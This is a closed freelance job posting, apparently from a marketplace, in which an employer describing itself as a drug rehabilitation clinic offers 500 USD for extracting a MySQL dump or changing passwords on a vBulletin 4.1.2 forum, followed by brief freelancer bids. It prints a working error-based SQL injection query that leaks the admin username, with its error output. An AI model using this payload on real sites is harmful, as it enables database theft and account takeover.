Closed

SQL Injection specialist needed. Urgent!

Our company (Rehabilitation clinic for people with drug addiction) has a forum which may have been compromised.

We're running Vbulletin Version 4.1.2 which is vulnerable and exploitable.

What we're looking for is SQL Injection expert to do penetentrion testing on our website. What we looking from sql expert is to see what the hackers could of done.

We're affraid that hacker might of gotten mysql dump, or changed any of the passwords for vbulletin in mysql.

Our company takes security very seriously and we cannot afford to have any of our customers/visitors information stolen.

We are offering 500 USD for someone who is able to extract mysql dump from our website, or UPDATE any of the mysql passwords.

For example this is the SQL query which is executed -

SELECT [url removed, login to view]

FROM socialgroupcategory AS socialgroupcategory

WHERE [url removed, login to view] IN (-99) union select username from user where userid=1 and row(1,1)>(select count(*),concat( (select [url removed, login to view]) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* );

So bassicly it returns to -

"#1062 - Duplicate entry 'admin:1' for key 1"

as "admin" being "username" record in database, field user.

We are not really that worries if hackers are not able to do anything more than extracting rows one-by-one.

BUT IF ALL MYSQL DUMP CAN BE LEAKED OR ANY PASSWORDS OR OTHER MYSQL DETEILS CAN BE CHANGED (UPDATE) This is risk.

So, if you're able to do anything more than "showing records one-by-one" please let us know.

WE OFFER 500 USD FOR SUCCESSFUL PENETRATION TESTING.

If you're ready to start testing/executing vulnabulity. Please send me messege, and I'll send you link to our forum, and where vulnability exists.

This is 100% legal. You'll be doing testing on our website, with our permission. We can proof that forum you're working on is OURs

Skills: PHP, SQL

See more: sql injection specialist, specialist company, so specialist, website penetration testing, legal specialist, vulnerable, urgent mysql, sql query, sql injection, rehabilitation, penetration, mysql specialist, it specialist, hackers, website sql injection, looking sql, link sql, php mysql sql example, php mysql permission, sql injection extract database, send messege, can stolen, extract records, sql select, php extract information website

About the Employer:
( 0 reviews ) Vilnius, Lithuania

Project ID: #1140504

14 freelancers are bidding on average $436 for this job

saiSoftIndia

Ready to start.

$500 USD in 3 days
(257 Reviews)
7.2
rmash

Please see pm.

$500 USD in 1 day
(150 Reviews)
6.9
bradhaas

Please see private message.

$500 USD in 0 days
(45 Reviews)
5.7
reco233

Hi, check your PMB please.

$500 USD in 0 days
(23 Reviews)
5.5
musashi42

Hi, I'm interested. Please check my profile and Your INBOX for more details. Thank You.

$500 USD in 0 days
(16 Reviews)
5.5
dungvit85

Ready to work for you. thanks

$500 USD in 1 day
(34 Reviews)
4.7
DeoTech

Hi! As I see mysql has truble with some rows and keys. At the first data can be extract or corectly updated. Regards.

$500 USD in 2 days
(6 Reviews)
4.1
mnworx

I can do this

$500 USD in 1 day
(12 Reviews)
3.8
ddtaxe

Greetings. This is Denis Mello an IT Architect and Security Professional whose qualifications include a degree in computer science; Certified Ethical Hacker, LINUX LPI, MCP Windows Server (2k, 2k3 and 2k8), Control Ob More

$250 USD in 3 days
(7 Reviews)
3.6
granush

Hello, Please check PM

$350 USD in 1 day
(5 Reviews)
3.4
Pandaweb

Microsoft certified technology specialist availible. please see PM for more information.

$500 USD in 1 day
(5 Reviews)
3.4
kronkalns

Please read your inbox.

$500 USD in 5 days
(0 Reviews)
0.0
Ciph3r

Please check you PMB

$250 USD in 2 days
(0 Reviews)
0.0
jaydipsinh

I have 5 yrs. exp in opensource

$250 USD in 4 days
(0 Reviews)
0.0